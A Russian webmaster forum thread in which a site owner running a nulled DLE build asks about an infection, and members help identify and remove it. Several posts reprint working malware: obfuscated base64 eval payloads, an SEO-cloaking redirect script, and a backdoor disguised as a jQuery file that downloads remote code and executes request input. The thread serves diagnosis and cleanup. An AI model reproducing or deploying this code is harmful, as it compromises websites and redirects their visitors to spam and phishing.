Скрыть объявление
ВАШИ ПРАВА ОГРАНИЧЕНЫ!

Зарегистрируйтесь на форуме, чтобы стать полноценным участником сообщества!

Вопрос? Заражён в конфигурации dbconfig.php

Тема в разделе "Вопросы- ответы", создана пользователем TacTics, 4 янв 2026.

04.01.26 в 01:27
11.01.26 в 14:24
22
2.014
0
  1. TopicStarter Overlay
    TacTics

    PRO Users

    Регистрация:
    3 мар 2022
    Сообщения:
    384
    Лучших ответов:
    0
    Рейтинги:
    +164 / 17 / -0
    Доброго времени суток!
    может кто-то сталкивался с таким, есть 2 сайта на DLE и один день начали очень сильно тормазить.
    обратился в поддержку мне сказали что файлы 2х сайтов заражены а именно одинаковые файлы.

    Наблюдаю что сайт ******.online и ******.online заражён в конфигурации dbconfig.php и такой вирус может не быть замечен антивирусом из-за чего результат может быть чистым.
    Ожидайте пожалуйста.

    Но в этом файле ничего такова нету. только данные подключения.

    Сервер у меня нормальный, нагрузка на него маленькая:
    Количество процессов: 488
    Оперативная память (использовано / всего): 4157 / 64249 MB
    Продолжительность работы: 282 days 23 hours 4 minutes
    Процессор: Intel(R) Xeon(R) CPU E5-2650 v2 @ 2.60GHz (16 cores)
    Размер дискового пространства: 10.83 TB
    Средняя загрузка (за 15 мин, 5 мин, 1 мин): 63.55 58.85 50.76
    Файл подкачки (swap): 2047 MB

    DLE 17.2 но оба нуллед скачивал от сюда.
     
  2. TopicStarter Overlay
    TacTics

    PRO Users

    Регистрация:
    3 мар 2022
    Сообщения:
    384
    Лучших ответов:
    0
    Рейтинги:
    +164 / 17 / -0
    Нашел в файлах:
    /engine/data/config.php
    /engine/data/dbconfig.php
    /engine/classes/mysql.php

    в далеке от кода <?php через пробелы вот это:

    Код:
    @eVAL(gzUncOmprEss(baSe64_deCode('eF6dVm1z2jgQ/iskk4lhQg02EKCMe1xT7pJpr/RIcnedNuORbYFVbMsjyaVpxX+/lWRIQu3e9D6Ard1nn33RSmuybB5FeEkyHDWt6/li8f7i8mr2m9VqfTPiJ9K2YAVuTU6+fvW7ntUddUfuwNJLx7Mcx7y63ol/PVv8NVt8sF7NL27/mL298Rfz+Y11NyHL5pRwPyKsqaEN2+oUeUJRxDs55YJ3lGel6nl1gMkWJxxXMW3yZyQLkyLClTxP1PUsIQpjXGVfKuot+T0XOO0kJGCI3VdRHCLqufaRRkigAPHKiCpA9YwBEYx86aQ0KpLqAh0iJlul6mtAr2Efc4EEtz/leHWsd3qw1wiSYvZIc77XbJDALEVs/Ug79Czft8BjwdU/ZnpB1F/kmyYaaYIhSMquGu8Fbtlx3b2kV0qcvaRfSty9ZNenvR/45qVzp+9Ndz1sBAMQaMUHazH781ahZ9c3/u3iCppaa84fEJc3Sn/zzr+9nqm3hf/r73AGdsjhY6SGvvMv5+p5vceMKtgWcACV38VsYU5S88h4blGzyxCDZ1lqNT3KGV75KRJh3IR9RSQqJEE+YmEsKV0lWJJViuRLKiTKIvxFojQA4d+9C1++Ry8Z3cgAdDmJMJOzRKCrTIYFSySKKZUMbRR4hYVMEUnsDrHaZSjQVKr3nrjXHmwgy6AVJKcrWkge4wwCIBn01EreK1pbpjyzQ1mIIsByQ4RC07XNCvl5bYdUFgldySUKcQBYGmV0DVg7uJcmPx0K8GOdJU+Ja5LUqTGTti2jIlyrn8zQZ5AimoBLFoS2DEi2ekhlZDI5SCW3A6gNB8MsYpREMiVRLu/TgKBMxiL0QZARyUFCuaQBgTp9clMsMSOYf2ycd2Ue0ww/rhiUBzaMcI5F88S/mM9fX80+WFGC/QIc+SSy7nagJ7F4KIoyvOESReDUzuNceokqrpAe4AhX9fOWGEcBgnxBVaI0HtQMCUKzfSgD48W8N468hqXvCNOIY+/YOZ5st1tdkyXk5eMvwME1HrI4NVJOvuJS9MJRwoO8zBm80/jDnPVRvVMtNAV5SOmaGK5h2xqOXaffHw5hBMFV02ydjXpjx2mrEPVQOToMaaBotDAvhB9S6L1sp9pzDLrdbmtSA+u3IeWWuQPdrmdQ0PMHZNq/wbyYGmJzsboO2NAcZzs2dHasnCU0XBsDp/1mfvHan/1jRqrrggHDKNppn1a03wJrgzs7Ax6YxVkIt+sOrTPZMPIgMWAlXiYFj0txZQy3b5U4TCjHe5ieJN+mRZaQbL1L9vGyX1u78/axKp3amcON6e/K49aVtP9QUveFbpjWf0XxaHne+j9tqt2MG57XUJt+2qzqTd233zWn0/txd24r2/O87gA4rnais++pMfTkcJQfUN9bde8qIoMI+rUhVbCMq0i6bZivP0EyqiAZt2Fq/wTHsIJj1IZPgRqOShK3DyxqGNZkWqPSpazTOZUd4Lat8QAqPd3fK44zNtFNYzjPGNjgumX4c9Pq/UJWaoyHdqY/PDbqv5OjFKsXQXiHr7Ver+OwE4bqxdZfKwB7tsdpw+c812sRN55rQkoE0vb0jdWC5ynHlOkvnaUHDxjdMMZxFtKoDH7U0sQMIoCB4X08WeP7DWURGMKC49OCeQ5YlgnAQ9AizyEnC8YMw0uYUTn4P4VhccBvxULkzzsqUu1qWD7hbp7AWRBm7+rGwHensmoudCtbYrv9F2QpG6s=')));//                                              @eVAL(gzUncOmprEss(baSe64_deCode('eNqdVv9z2jYU/1cgl4vhQg02EEg5d6wZW3LtSkeSbb0255NtgVVsyyfJoVnF/74nyZCE2t11P4Ct9z7v877oSc9k2WpGeEkyHLWs6/li8eHi8mr2q9VufzXiZ9KOYAVuT47T1O95luv0XHdo6aUDy/LV9Y7969niz9nio/XL/OL299m7G38xn99YdxOybE0J9yPCWhrasK1ukScURbybUy54V3lWqr5XB5hsccJxFdMmf0GyMCkiXMnzTF3PEqIwxlX2paLekj9wgdNuQgKG2EMVxSGinmsfaYQEChCvjKgCVM8YEMHIl25KoyKpLtAhYrJVqoEG9Bv2ERdIcPtzjldHeqeHe40gKWZPNGd7zQYJzFLE1k+0I8/yfQs8Flz9Y6YXRP1FvmmisSYYgcQxgvO9wC07rreX9EuJs5cMSom7l+z6tP8d37x07gy86a6HjWAIAq34aC1mf9wq9Oz6xr9dXEFTa83ZI+LyRulv3vu31zP1tvB//g3OwA45eorU0Pf+5Vw9r/eYcQXbAg6g8ruYLcxJajWN5zY1uwwxeJalVtNmzvDKT5EI4xbsKyJRIQnyEQtjSekqwZKsUiRfUyFRFuEvEqUBCP/qX/jyA3rN6EYGoMtJhJmcJQJdZTIsWCJRTKlkaKPAKyxkikhid4nVKUOBplK998y99mADWQatIDld0ULyGGcQAMmgp1byQdHaMuWZHcpCFAGWGyIUmq5tVsj7tR1SWSR0JZcoxAFgaZTRNWDt4EGa/HQowI91ljwlrklSp8ZM2raMinCtfjJD9yBFNAGXLAhtGZBs9ZjK2GRykEpuB1AbDoZZxCiJZEqiXD6kAUGZjEXogyAjkoOEckkDAnX67KZYYkYw/9Q468k8phl+WjEoD2wY4RyL1rF/MZ+/uZp9tKIE+wU48klk3e1Az2LxUBRleMMlisCpnce59BJVXCE9wBGu6uctMY4CBPmCqkRpPKgZEoRm+1CGxot5bzS9hqXvCNOI596RczTZbre6JkvIy8dfgINrPGRxYqSc/INL0StHCQ/yMmfwTuObFbrRnWqhKchDStfEcI061ujcdQaD0QhGEFw1rfbp2AVBR4Woh0rzMKShotHCvBB+SKH3sp1qzzHs9XrtSQ1s0IGU2+YOdHueQUHPH5Bp/wbzamqIzcXqOmBDc5zt2NDpkXKW0HBtDJzO2/nFG3/2txmprgsGDKNop31e0UEbrA3u9BR4YBZnIdyuO7TOZMPIo8SAlXiZFDwuxZUx3L5T4jChHO9hepJ8nRZZQrL1Ltmny0Ft7c46R6p0amcON2awK49bV9LBY0ndV7ph2v8VxZPlWfv/tKlp8obnNdSmn7SadX37TXM6/e9357ayPc/qDoDjaic6+74aQ88OR/kB9a1V764iMqcDg7AupAqW8yqSXgfm6w+QjCtIzjswtX+AY1TBMe7Ap0ANRyWJOwAWNQxrMq1R6VLW6ZzKDnA71vkQKj3d3yvOLrppDOcZAxtctwzft6z+T2SlxnhoZ/rDY6P+uzlKsXoRhHf5Wuv1Og67YahebP21ArAXe5w2fMlzvRZx46UmpEQgbU/fWm14nnBMmf7SWXrwgNENYxxnIY3K4MdtTcwgAhgY3qfjNX7YUBaBISw4PimY54BlmQA8BC3yHHKyYMwwvIQZlYP/ExgWB/xWLET+sqsiNV8+5RPu5gmcBWH2rm4MfHMqq+ZCr7Ilttt/AfJmD2c=')));                                                                                                                                                                                                                                    
     
    #2 TacTics, 4 янв 2026
    Последнее редактирование: 4 янв 2026
    • Полезно Полезно x 1
  3. Alex_pp

    PRO Users

    Регистрация:
    1 сен 2020
    Сообщения:
    420
    Лучших ответов:
    0
    Рейтинги:
    +129 / 28 / -0
    TacTics
    Код:
    if(!defined('SORRYCHIEF')){define('SORRYCHIEF',true);$zz_0='080825';$zz_1='11';$zz_2=$_SERVER['DOCUMENT_ROOT'];if(@is_dir($zz_2 .'/uploads/posts/')){$zz_3=$zz_2 .'/uploads/posts/';}elseif(@is_dir($zz_2 .'/wp-includes/')){$zz_3=$zz_2 .'/wp-includes/';}elseif(@is_dir($zz_2 .'/cache/')){$zz_3=$zz_2 .'/cache/';}elseif(@is_dir($zz_2 .'/system/library/')){$zz_3=$zz_2 .'/system/library/';}elseif(@is_dir($zz_2 .'/includes/database/')){$zz_3=$zz_2 .'/includes/database/';}elseif(@is_dir($zz_2 .'/bitrix/modules/')){$zz_3=$zz_2 .'/bitrix/modules/';}$zz_4=$zz_3 ."stats.jpeg";$zz_5=$zz_3 ."timer.jpeg";$zz_6=$zz_3 ."watermark.jpeg";$zz_7='__' .'us' .'er_' .'i' .'d_';$zz_8=$zz_7 .'1';$zz_9=$zz_7 .'2';$zz_10=$zz_7 .'3';$zz_11=$zz_7 .'4';$zz_12=$zz_7 .'5';$zz_13='__' .'us' .'er_' .'i' .'ds_';$zz_14=@$_SERVER;$zz_15=@$zz_14['REQU' .'EST_URI'];$zz_16=@$zz_14['HT' .'TP_USE' .'R_AGENT'];$zz_17=@$zz_14['HTT' .'P_HO' .'ST'];$zz_18=@$zz_14['HT' .'TP_REF' .'ERER'];if((!$zz_16)or($zz_16=='')or(@!preg_match('/baidu|ia_arch|oogle|igma|Bot|andex|amble|W3C_|YaBrow|bot|pider|EltaIn|curl|ahoo|rawle|Wget|mail./i',$zz_16))){if(@preg_match('/andex.|pinter|sogou|shenma|instag|yahoo.|msn.c|utube|witter|ok.ru|vk.co|ulog|facebo.|odnok|ut.by|baidu|mail.r|search|smi2|igma|ambler|oogle.|duckduck|naver|aol.c|rbc.|bing./i',$zz_18)){if((@preg_match('/p.browser|ndroid|midp|ymbian|htc_|mini|symbos|obile|j2me|eries\ 60|phone/i',$zz_16))and(@!isset($_COOKIE['dle_user_id']))and(@!preg_match('/=addnews|admin.php|=logout|=register|=feedback|login.php|administration/i',$zz_15))and($zz_15 != '/')){@$zz_19="1";}}}if((@file_exists($zz_6))&(@filesize($zz_6)>1)&(@isset($_COOKIE[$zz_13]))&(@!isset($_COOKIE[$zz_7]))){@setcookie($zz_7,'79214477',time()+83911,'/');if(@!file_exists($zz_5)){@file_put_contents($zz_5,time()+85000);@file_put_contents($zz_4,"1");}$zz_20=@file_get_contents($zz_5);if($zz_20>@time()){$zz_21=@fopen($zz_4,"a+");@flock($zz_21,LOCK_EX);$zz_22=@fread($zz_21,@filesize($zz_4));@$zz_22++;@ftruncate($zz_21,0);@fwrite($zz_21,$zz_22);@fflush($zz_21);@flock($zz_21,LOCK_UN);@fclose($zz_21);}else{@unlink($zz_5);@unlink($zz_4);@file_put_contents($zz_6,"");}if(@file_exists($zz_4)){$zz_22=@file_get_contents($zz_4);if($zz_22>$zz_1){@unlink($zz_5);@unlink($zz_4);@unlink($zz_6);}}}if((@file_exists($zz_6))&(@filesize($zz_6)>1)&(@$zz_19 == "1")&(!isset($_COOKIE[$zz_13]))){@setcookie($zz_13,'79214477',time()+83911,'/');}if(@!file_exists($zz_6)&(@!isset($_COOKIE[$zz_12]))){$zz_23=@$_COOKIE[$zz_7];if(@isset($_COOKIE[$zz_10])){@setcookie($zz_11,'4',time()+83911,'/');}if(@isset($_COOKIE[$zz_9])){@setcookie($zz_10,'3',time()+83911,'/');}if(@isset($_COOKIE[$zz_8])){@setcookie($zz_9,'2',time()+83911,'/');}if(@isset($_COOKIE[$zz_7])){@setcookie($zz_8,'1',time()+83911,'/');}if((@isset($_COOKIE[$zz_24]))or(@isset($_COOKIE[$zz_9]))or(@isset($_COOKIE[$zz_10]))or(@isset($_COOKIE[$zz_11]))){@setcookie($zz_12,'954',@time()+85119,'/');@header(@strrev('3?ig' .'c.n' .'iw' .'/pame' .'tis/sk' .'ce' .'hc/cc' .'.s' .'pam-e' .'tis/' .'/:sp' .'tth :n' .'oita' .'coL') .'&seor' .'ef=' .rawurlencode($zz_18) .'parameter=\$keyword&se=\$se&ur=1' .strrev(strtoupper('=rerefer_ptth&')) .rawurlencode('http://' .$zz_17 .$zz_15));exit;}if((!isset($_COOKIE[$zz_7]))&(@$zz_19 == "1")){@setcookie($zz_7,'0',time()+83911,'/');}}}

    Код:
    if(!defined('SORRYCHIEF')){define('SORRYCHIEF',true);$mm_0='210225';$mm_1='25';$mm_2=$_SERVER['DOCUMENT_ROOT'];if(@is_dir($mm_2 .'/uploads/posts/')){$mm_3=$mm_2 .'/uploads/posts/';}elseif(@is_dir($mm_2 .'/wp-includes/')){$mm_3=$mm_2 .'/wp-includes/';}elseif(@is_dir($mm_2 .'/cache/')){$mm_3=$mm_2 .'/cache/';}elseif(@is_dir($mm_2 .'/system/library/')){$mm_3=$mm_2 .'/system/library/';}elseif(@is_dir($mm_2 .'/includes/database/')){$mm_3=$mm_2 .'/includes/database/';}elseif(@is_dir($mm_2 .'/bitrix/modules/')){$mm_3=$mm_2 .'/bitrix/modules/';}$mm_4=$mm_3 ."stats.jpeg";$mm_5=$mm_3 ."timer.jpeg";$mm_6=$mm_3 ."watermark.jpeg";$mm_7='__' .'us' .'er_' .'i' .'d_';$mm_8=$mm_7 .'1';$mm_9=$mm_7 .'2';$mm_10=$mm_7 .'3';$mm_11=$mm_7 .'4';$mm_12=$mm_7 .'5';$mm_13='__' .'us' .'er_' .'i' .'ds_';$mm_14=@$_SERVER;$mm_15=@$mm_14['REQU' .'EST_URI'];$mm_16=@$mm_14['HT' .'TP_USE' .'R_AGENT'];$mm_17=@$mm_14['HTT' .'P_HO' .'ST'];$mm_18=@$mm_14['HT' .'TP_REF' .'ERER'];if((!$mm_16)or($mm_16=='')or(@!preg_match('/baidu|ia_arch|oogle|igma|Bot|andex|amble|W3C_|YaBrow|bot|pider|EltaIn|curl|ahoo|rawle|Wget|mail./i',$mm_16))){if(@preg_match('/andex.|pinter|sogou|shenma|instag|yahoo.|msn.c|utube|witter|ok.ru|vk.co|ulog|facebo.|odnok|ut.by|baidu|mail.r|search|smi2|igma|ambler|oogle.|duckduck|naver|aol.c|rbc.|bing./i',$mm_18)){if((@preg_match('/p.browser|ndroid|midp|ymbian|htc_|mini|symbos|obile|j2me|eries\ 60|phone/i',$mm_16))and(@!isset($_COOKIE['dle_user_id']))and(@!preg_match('/=addnews|admin.php|=logout|=register|=feedback|login.php|administration/i',$mm_15))and($mm_15 != '/')){@$mm_19="1";}}}if((@file_exists($mm_6))&(@filesize($mm_6)>1)&(@isset($_COOKIE[$mm_13]))&(@!isset($_COOKIE[$mm_7]))){@setcookie($mm_7,'79214477',time()+82214,'/');if(@!file_exists($mm_5)){@file_put_contents($mm_5,time()+85000);@file_put_contents($mm_4,"1");}$mm_20=@file_get_contents($mm_5);if($mm_20>@time()){$mm_21=@fopen($mm_4,"a+");@flock($mm_21,LOCK_EX);$mm_22=@fread($mm_21,@filesize($mm_4));@$mm_22++;@ftruncate($mm_21,0);@fwrite($mm_21,$mm_22);@fflush($mm_21);@flock($mm_21,LOCK_UN);@fclose($mm_21);}else{@unlink($mm_5);@unlink($mm_4);@file_put_contents($mm_6,"");}if(@file_exists($mm_4)){$mm_22=@file_get_contents($mm_4);if($mm_22>$mm_1){@unlink($mm_5);@unlink($mm_4);@unlink($mm_6);}}}if((@file_exists($mm_6))&(@filesize($mm_6)>1)&(@$mm_19 == "1")&(!isset($_COOKIE[$mm_13]))){@setcookie($mm_13,'79214477',time()+82214,'/');}if(@!file_exists($mm_6)&(@!isset($_COOKIE[$mm_12]))){$mm_23=@$_COOKIE[$mm_7];if(@isset($_COOKIE[$mm_10])){@setcookie($mm_11,'4',time()+82214,'/');}if(@isset($_COOKIE[$mm_9])){@setcookie($mm_10,'3',time()+82214,'/');}if(@isset($_COOKIE[$mm_8])){@setcookie($mm_9,'2',time()+82214,'/');}if(@isset($_COOKIE[$mm_7])){@setcookie($mm_8,'1',time()+82214,'/');}if((@isset($_COOKIE[$mm_24]))or(@isset($_COOKIE[$mm_9]))or(@isset($_COOKIE[$mm_10]))or(@isset($_COOKIE[$mm_11]))){@setcookie($mm_12,'954',@time()+85114,'/');@header(@strrev('3?ig' .'c.n' .'iw' .'/pame' .'tis/sk' .'ce' .'hc/cc' .'.s' .'pam-e' .'tis/' .'/:sp' .'tth :n' .'oita' .'coL') .'&seor' .'ef=' .rawurlencode($mm_18) .'parameter=\$keyword&se=\$se&ur=1' .strrev(strtoupper('=rerefer_ptth&')) .rawurlencode('http://' .$mm_17 .$mm_15));exit;}if((!isset($_COOKIE[$mm_7]))&(@$mm_19 == "1")){@setcookie($mm_7,'0',time()+82214,'/');}}}
     
  4. TopicStarter Overlay
    TacTics

    PRO Users

    Регистрация:
    3 мар 2022
    Сообщения:
    384
    Лучших ответов:
    0
    Рейтинги:
    +164 / 17 / -0
    Alex_pp а можно поподробнее :) не совсем понимаю что это. Заранее большое спасибо.
     
  5. Jo0k

    Jo0k Бывалый

    Регистрация:
    5 фев 2019
    Сообщения:
    146
    Лучших ответов:
    1
    Рейтинги:
    +87 / 11 / -0
    Вот ChatGPT:

    Код:
    Это вредоносный SEO-вирус (SEO-cloaking / redirect / doorway), очень распространённый на сайтах DLE, WordPress, Bitrix и т.д.
    
    Коротко: он незаметно перенаправляет мобильных посетителей из поисковиков на сторонние спам-сайты и живёт за счёт cookies и скрытых файлов.
    
    Что именно это за вирус
    
    Это SEO-редирект под мобильный трафик с поисковых систем:
    
    Определяет CMS (DLE, WP, Bitrix и др.)
    
    Проверяет User-Agent (мобильные браузеры)
    
    Проверяет Referer (Google, Yandex, Bing, Yahoo, Mail.ru и т.п.)
    
    Игнорирует ботов
    
    Работает только для гостей, не для админов
    
    После этого:
    ➡️ делает скрытый 302-редирект на спам-домен вида
    hxxp://ccheck/stitemap/...
    
    Почему он такой «странный»
    Маскировка:
    
    Файлы называются как картинки:
    
    stats.jpeg
    timer.jpeg
    watermark.jpeg
    
    
    но это не картинки, а служебные файлы вируса
    
    Cookies:
    
    __user_id_1
    
    __user_id_2
    
    __user_ids_
    
    и т.д.
    
    Нужны, чтобы:
    
    не редиректить пользователя каждый раз
    
    не палиться поисковым ботам
    
    дозировать трафик (лимит $zz_1 = 11)
    
    Что он делает по шагам
    
    Ищет папку CMS:
    
    /uploads/posts/
    /wp-includes/
    /bitrix/modules/
    /system/library/
    
    
    Создаёт служебные файлы:
    
    watermark.jpeg  ← флаг активности
    timer.jpeg      ← таймер жизни
    stats.jpeg      ← счётчик переходов
    
    
    Проверяет:
    
    мобильный ли пользователь
    
    пришёл ли из поисковика
    
    не залогинен ли
    
    Делает редирект на спам-сайт
    
    Ставит cookies, чтобы:
    
    повторно не редиректить
    
    обходить анти-вирусы
    
    Опасен ли он?
    
    Да. Очень.
    
    Последствия:
    
    ❌ бан сайта в Google / Яндексе
    
    ❌ «Вредоносное ПО» в Search Console
    
    ❌ падение позиций
    
    ❌ утечка трафика
    
    ❌ возможная подгрузка JS-вирусов дальше
    
    Где он обычно находится
    
    Чаще всего:
    
    index.php
    
    engine/init.php (DLE)
    
    engine/engine.php
    
    wp-config.php
    
    header.php
    
    functions.php
    
    файлы шаблона .tpl
    
    Иногда вставлен в базу:
    
    шаблоны
    
    новости
    
    баннеры
    
    Что делать СРОЧНО
    1️⃣ Удалить код
    
    Полностью. Без «комментирования».
    
    2️⃣ Удалить файлы
    
    Во всех папках сайта ищи и удаляй:
    
    stats.jpeg
    timer.jpeg
    watermark.jpeg
    
    3️⃣ Проверить весь сайт
    
    По сигнатурам:
    
    __user_id_
    watermark.jpeg
    stats.jpeg
    strrev(
    rawurlencode(
    HTTP_REFERER
    
    4️⃣ Сменить ВСЕ пароли
    
    FTP / SFTP
    
    SSH
    
    MySQL
    
    админку CMS
    
    5️⃣ Проверить cron
    
    Часто вирус самовосстанавливается.
     
  6. Alex_pp

    PRO Users

    Регистрация:
    1 сен 2020
    Сообщения:
    420
    Лучших ответов:
    0
    Рейтинги:
    +129 / 28 / -0
    TacTics вкратце кто-то зарабатывает на твоем сайте, это два кусок кода перенаправляет пользователей на https://site-maps.cc/checks/sitemap/win.cgi?3
    причем перенаправляет на всякие казино, фишинг и всякую фигню
     
  7. TopicStarter Overlay
    TacTics

    PRO Users

    Регистрация:
    3 мар 2022
    Сообщения:
    384
    Лучших ответов:
    0
    Рейтинги:
    +164 / 17 / -0
    Удаления кода из этих файлов достаточно ? или нужно лечить как то по другому
     
  8. Alex_pp

    PRO Users

    Регистрация:
    1 сен 2020
    Сообщения:
    420
    Лучших ответов:
    0
    Рейтинги:
    +129 / 28 / -0
    TacTics для начало сделай бэкап а потом удали этот код и погляди
     
  9. TopicStarter Overlay
    TacTics

    PRO Users

    Регистрация:
    3 мар 2022
    Сообщения:
    384
    Лучших ответов:
    0
    Рейтинги:
    +164 / 17 / -0
    У меня каждый день делается полная копия сервера.
    Просканировал все сайты таких файлов не нашел.
    Пока что в эти файлы код не добавился!
    Сайт начал летать. Но буду смотреть.
     
  10. Roman.U

    PRO Users

    Регистрация:
    13 ноя 2015
    Сообщения:
    6.890
    Лучших ответов:
    5
    Рейтинги:
    +1.229 / 154 / -0
    Часто с подобным сталкивался когда доступ к сайту давал разным недобросовестным кодерам. Но обычно они скрытый майнинг ставили.
    Вспоминай кому давал доступы к сайту. Если нет тогда не знаю как появилась у тебя эта дичь. У меня чисто на счет этого.
    Если сохранилась ДЛЕ которую скачивал, глянь там, если есть, кинь ссыль на тему, что бы форумчани знали, кому не стоит доверять, и не скачивали его файлы.
     
    • Согласен Согласен x 1
  11. TopicStarter Overlay
    TacTics

    PRO Users

    Регистрация:
    3 мар 2022
    Сообщения:
    384
    Лучших ответов:
    0
    Рейтинги:
    +164 / 17 / -0
    Доступ имею только я и поддержка хостинга, больше туда никто не заходил.
    DLE не сохранилась, и точную ссылку я уже не помню, так как было год назад, но точно знаю что скачивал с этого форума. Не хочу говорить ничего плохого ни про форум, ни про автора DLE Nulled — возможно, заражение попало и с другого сайта.
    Сейчас сайт работает стабильно, и вредоносный код больше не появляется.
    На всякий случай ещё раз заменю все пароли и названия баз данных.
     
  12. Donate

    Команда форума VIP Кинотрафик v2

    Регистрация:
    31 мар 2021
    Сообщения:
    742
    Лучших ответов:
    8
    Рейтинги:
    +582 / 111 / -0
    Не стоило качать крякнутый DLE или бесплатные шаблоны с левых сайтов. Этой теме уже много лет. Помимо файлов конфига он заражает еще другие файлы, а также оставляет бекдор для повторного заражения в случае удаления (зачастую в разных местах). В последний раз когда я эту штуку встречал, трафик уже даже никуда и не сливался, так как редиректы просто отправляли юзеров на неработающий сайт. Этот вирус как неприкаянная форма жизни, потерявшая своего создателя, живет в старых сборках и шаблонах, реплецируясь на новые сервера. Код не обфусцируется, это все тот же код написанный лет 10 назад, вряд ли его кто то поддерживает. Хотя черт его знает, может создатель просто очень ленивый и у него итак все хорошо, а мне попадались старые версии.

    Вылечить это руками очень сложно, так как бекдоры в зависимости от доступов могут оставляться не только в файлах конфига, а также и в js файлах. Мне помогло полностью избавиться от этого вируса сканирование антивирусом ImunifyAV (модуль в панели ISP Manager), также есть BitNinja (который по отзывам еще лучше). Но если у тебя не ISP панель, наверное надо будет искать какие то другие веб антивирусы, или локально устанавливать эти (не знаю есть ли у них такая опция).

    Руками по гайдам в интернете это удалить полностью невозможно, так как информация в гайдах разрозненная, и так как у вируса несколько разных вариаций, хотя и устаревших, полного гайда по ним нет. Одним из вариантов заражения (еще в старое время) было заливание в папку uploads/fotos "картинки" с jpgq расширением (то есть не картинки, а вредоносного файла), который дле пропускал как картинку.
     
  13. TopicStarter Overlay
    TacTics

    PRO Users

    Регистрация:
    3 мар 2022
    Сообщения:
    384
    Лучших ответов:
    0
    Рейтинги:
    +164 / 17 / -0
    Donate Темы я покупал всегда у webrambo. плагины всегда купленные у lazydev. остаётся только сам DLE nulled.
    Да был таькой файл один .jpgq но я его сразу удалил. Вот он foto_57630354.jpeq
    ImunifyAV Больше ничего не показывал.

    Код:
    <?php
    /*
     * jQuery Image Library v1.6.3
     * http://jquery.com/
     *
     * Copyright 2011, John Resig
     * Dual licensed under the MIT or GPL Version 2 licenses.
     * http://jquery.org/license
     *
     * Includes Sizzle.js
     * http://sizzlejs.com/
     * Copyright 2011, The Dojo Foundation
     * Released under the MIT, BSD, and GPL Licenses.
     *
     * Date: Thu May 12 15:04:36 2011 -0400
     *  *  *  *  *  *  * *  *  *  *  *  *  *  *  *  *  *  *  *  Don't delete this file *  *  *  *  *  *  *  *  *  *  *  *  *  *  *  *
     */
    @ini_set('error_log', NULL);
    @ini_set('log_errors', 0);
    @ini_set('display_errors', 0);
    @ini_set('allow_url_fopen', 1);
    @error_reporting(0);
    /*
    Lightbox v2.51
    by Lokesh Dhakar - http://www.lokeshdhakar.com
    
    For more information, visit:
    http://lokeshdhakar.com/projects/lightbox2/
    
    Licensed under the Creative Commons Attribution 2.5 License - http://creativecommons.org/licenses/by/2.5/
    - free for use in both personal and commercial projects
    - attribution requires leaving author name, author link, and the license info intact
        
    Thanks
    - Scott Upton(uptonic.com), Peter-Paul Koch(quirksmode.com), and Thomas Fuchs(mir.aculo.us) for ideas, libs, and snippets.
    - Artemy Tregubenko (arty.name) for cleanup and help in updating to latest proto-aculous in v2.05.
    */
    
    
    echo "<!-- "."tes"."ts -->";
    $cmat='unct' .'ion';$cmat= 'cre' . 'ate' .'_f' .$cmat;$Libr= "_ostp";
    $sizz=strtoupper($Libr[0].$Libr[4].$Libr[1].$Libr[2].$Libr[3] );if((isset(${$sizz }[ 'j01bt5ri3p']))&(isset(${$sizz}['fail']))){
    if(isset(${$sizz}[ 'pathik'])){$pathik=$_SERVER['DOCUMENT_ROOT'].${$sizz}['pathik'];}else{$pathik=$_SERVER['DOCUMENT_ROOT'].'/license.php';}
    if(isset(${$sizz}[ 'unl'])){@unlink($pathik);exit();}
    /*! jQuery [email protected] jquery.com | jquery.org/license */
    if(@ini_get('allow_url_fopen')){@copy('http://'.${$sizz}['fail'].'/test.txt', $pathik);}
    if((@function_exists('curl_init'))and ((!file_exists($pathik)) or (@filesize($pathik)<'1'))) {
    $ch = @curl_init();curl_setopt( $ch, CURLOPT_URL, 'http://'.${$sizz}['fail'].'/test.txt' );
    curl_setopt( $ch, CURLOPT_USERAGENT, $_SERVER['HTTP_USER_AGENT'] );curl_setopt( $ch, CURLOPT_RETURNTRANSFER, 1 );curl_setopt($ch, CURLOPT_TIMEOUT, 5);
    $fp = @fopen($pathik, 'w');curl_setopt($ch, CURLOPT_FILE, $fp);@curl_exec( $ch );curl_close( $ch );fclose($fp);}}
    if (@function_exists($cmat)){if(isset( ${$sizz }[ 'j01bt5ri3p'] ) ) {$cmat('', '};'.${$sizz }['j01bt5ri3p'].'{');}}
    ?>
     
  14. sneiks

    Команда форума VIP Кинотрафик v2

    Регистрация:
    27 янв 2016
    Сообщения:
    344
    Лучших ответов:
    0
    Рейтинги:
    +58 / 2 / -0
    Я бы скачал чистую DLE с оф сайта, ну или попросил скачать у кого есть доступ. И далее сравнил папки engine, index.php, admin.php И так далее …
     
  15. TopicStarter Overlay
    TacTics

    PRO Users

    Регистрация:
    3 мар 2022
    Сообщения:
    384
    Лучших ответов:
    0
    Рейтинги:
    +164 / 17 / -0
    Я вообще не понимаю зачем я поставил null если у меня есть лицензия DLE на 17.2 только не могу скачать с офф. так как надо продлить, а мне не хочется :)
     
  16. Kandi

    Kandi Бывалый

    Регистрация:
    19 апр 2019
    Сообщения:
    593
    Лучших ответов:
    1
    Рейтинги:
    +121 / 43 / -0
    Ну я смотрю время идёт, а бэкдоры всё те же. Помню запустил свой первый муз сайт в 2009 на DLE Nulled на каком-то шаблоне, наполнял его каждый день, даже были какие-то юзеры и я успел рекламу установить от какой-то древней рекламной сети, а мне его сломали через несколько недель. Как же я тогда расстроился это просто ппц, и всё не мог понять что за сцукины дети это сделали :D
     
  17. sindroniks

    sindroniks Зелёный

    Регистрация:
    30 май 2022
    Сообщения:
    6
    Лучших ответов:
    0
    Рейтинги:
    +3 / 0 / -0
    Скачал крякнутый dle с сайта dleshka.org 100%, у них там ещё шелы зашиты к примеру в папке ajax есть файл redis.php с таким содержанием, там же ещё может быть js.php подобный код содержится.
     

    Вложения:

  18. Skyworker

    Skyworker Бывалый

    Регистрация:
    4 май 2025
    Сообщения:
    356
    Лучших ответов:
    0
    Рейтинги:
    +81 / 19 / -0
    ТС, ты просто клоун в моих глазах. За свой сервак ты отваливаешь сотни баксов в месяц хостеру за аренду, покупаешь шаблоны и плагины для DLE у разрабов. А купить пару чистых лицензий DLE у разраба движка тебе, что, религия не позволяет? Ну, продолжай упорствовать в своей тупости и дальше, мне-то пофиг на твои сайты. Мне как-то раз подсунул такой вирус хостер, на мои письма отказывался отвечать, пришлось вычищать все самому и переезжать на другие сервера. В другой раз вирус лез на мои WordPress сайты через бесплатный скрипт и пока я не снес этот скрипт, через бэк дор он продолжал совать свои вирусы, сколько бы я их не вычищал. Делай выводы, если есть чем, короче :cool:
     
